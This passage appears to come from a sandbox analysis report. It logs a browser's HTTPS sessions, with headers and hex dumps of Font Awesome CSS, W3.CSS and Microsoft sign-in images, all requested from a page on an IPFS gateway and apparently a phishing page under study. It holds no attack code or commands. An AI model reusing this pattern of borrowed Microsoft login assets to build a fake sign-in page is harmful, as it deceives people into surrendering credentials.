2024-04-16 09:44:00 UTC	1369	IN	Data Raw: 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 Data Ascii: ion,normal);animation-direction:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,1s);animation-duration:var(--fa-animation-duration,1s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinit
2024-04-16 09:44:00 UTC	1369	IN	Data Raw: 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 6c 69 6e 65 61 72 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 6c 69 6e 65 61 72 29 7d 2e 66 61 2d 73 70 69 6e 2d 72 65 76 65 72 73 Data Ascii: --fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-animation-timing-function:var(--fa-animation-timing,linear);animation-timing-function:var(--fa-animation-timing,linear)}.fa-spin-revers
2024-04-16 09:44:00 UTC	1369	IN	Data Raw: 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 6f 75 6e 63 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e Data Ascii: sform:scale(var(--fa-beat-scale,1.25))}}@keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-beat-scale,1.25))}}@-webkit-keyframes fa-bounce{0%{-webkit-tran
2024-04-16 09:44:00 UTC	1369	IN	Data Raw: 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 31 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 33 30 25 7b 2d 77 65 62 6b 69 74 2d 74 Data Ascii: nsform:scale(1) translateY(0)}10%{-webkit-transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0);transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0)}30%{-webkit-t
2024-04-16 09:44:00 UTC	1369	IN	Data Raw: 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 30 25 2c 74 6f 7b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61 63 69 74 79 2c 2e 34 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 2d 77 65 62 6b Data Ascii: ale,1.125))}}@keyframes fa-beat-fade{0%,to{opacity:var(--fa-beat-fade-opacity,.4);-webkit-transform:scale(1);transform:scale(1)}50%{opacity:1;-webkit-transform:scale(var(--fa-beat-fade-scale,1.125));transform:scale(var(--fa-beat-fade-scale,1.125))}}@-webk
2024-04-16 09:44:00 UTC	1369	IN	Data Raw: 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 7d 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 7d 38 25 2c 32 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 7d 31 32 25 2c 32 38 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 7d 31 36 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 Data Ascii: rotate(-15deg);transform:rotate(-15deg)}4%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}8%,24%{-webkit-transform:rotate(-18deg);transform:rotate(-18deg)}12%,28%{-webkit-transform:rotate(18deg);transform:rotate(18deg)}16%{-webkit-transform:rotat

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49707	192.229.173.207	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:00 UTC	548	OUT	GET /w3css/4/w3.css HTTP/1.1 Host: www.w3schools.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://cloudflare-ipfs.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:44:00 UTC	506	IN	HTTP/1.1 200 OK Age: 12385 Cache-Control: public,max-age=14400,public Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com; Content-Type: text/css Date: Tue, 16 Apr 2024 09:44:00 GMT Etag: "08a77381e8fda1:0+ident" Last-Modified: Mon, 15 Apr 2024 10:18:12 GMT Server: ECS (agb/5385) Vary: Accept-Encoding X-Cache: HIT X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com; X-Powered-By: ASP.NET Content-Length: 23427 Connection: close
2024-04-16 09:44:00 UTC	15896	IN	Data Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes /html{box-sizing:border-box},:before,:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
2024-04-16 09:44:00 UTC	7531	IN	Data Raw: 61 6d 62 65 72 2c 2e 77 33 2d 68 6f 76 65 72 2d 61 6d 62 65 72 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 63 31 30 37 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 61 71 75 61 2c 2e 77 33 2d 68 6f 76 65 72 2d 61 71 75 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 39 36 46 33 21 69 6d 70 6f 72 74 61 Data Ascii: amber,.w3-hover-amber:hover{color:#000!important;background-color:#ffc107!important}.w3-aqua,.w3-hover-aqua:hover{color:#000!important;background-color:#00ffff!important}.w3-blue,.w3-hover-blue:hover{color:#fff!important;background-color:#2196F3!importa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49711	13.107.213.40	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:00 UTC	657	OUT	GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://cloudflare-ipfs.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:44:00 UTC	785	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 09:44:00 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:48 GMT ETag: 0x8DB5C3F4911527F x-ms-request-id: bd254fe0-e01e-003c-0538-8f3096000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240416T094400Z-18655757dbcrzwhputx21vz6p400000003h00000000000fa x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-04-16 09:44:00 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49716	13.107.246.40	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:00 UTC	655	OUT	GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://cloudflare-ipfs.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:44:01 UTC	779	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 09:44:01 GMT Content-Type: image/svg+xml Content-Length: 276 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT ETag: 0x8D79ED35591CF44 x-ms-request-id: 048c7887-d01e-0063-46e2-8fdaba000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240416T094400Z-18655757dbcbzxzp0h22gr876n00000003pg000000001de6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-04-16 09:44:01 UTC	276	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37 Data Ascii: Q=o +=tEk["/g;n,{2eJ)8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49713	13.107.213.40	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:00 UTC	677	OUT	GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://cloudflare-ipfs.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:44:00 UTC	806	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 09:44:00 GMT Content-Type: image/svg+xml Content-Length: 2407 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:49 GMT ETag: 0x8DB5C3F499A9B99 x-ms-request-id: 7d9d0ed0-201e-0048-412f-8f6e9e000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240416T094400Z-18655757dbcrzwhputx21vz6p400000003g0000000000mkc x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-04-16 09:44:00 UTC	2407	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04 Data Ascii: Y=s8mrfy8RlNkl?{$l\|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx\|\|y=/3kN2H;<sy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49714	152.199.4.44	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:00 UTC	663	OUT	GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://cloudflare-ipfs.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:44:00 UTC	737	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 4309724 Cache-Control: public, max-age=31536000 Content-MD5: 1jQlecEJaGhFO2st5KXLhg== Content-Type: image/svg+xml Date: Tue, 16 Apr 2024 09:44:00 GMT Etag: 0x8DB5C3F4AC59B47 Last-Modified: Wed, 24 May 2023 10:11:51 GMT Server: ECAcc (agc/7F54) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 7e961d5b-a01e-006d-2fb0-68c71f000000 x-ms-version: 2009-09-19 Content-Length: 1636 Connection: close
2024-04-16 09:44:00 UTC	1636	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49712	13.107.213.40	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:00 UTC	660	OUT	GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://cloudflare-ipfs.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:44:00 UTC	784	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 09:44:00 GMT Content-Type: image/svg+xml Content-Length: 199 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:49 GMT ETag: 0x8DB5C3F49C21D98 x-ms-request-id: 205f2221-901e-0023-4645-8e09ab000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240416T094400Z-r1f585c6b654jmm7xyrapwaprg000000021g00000000155z x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT Accept-Ranges: bytes
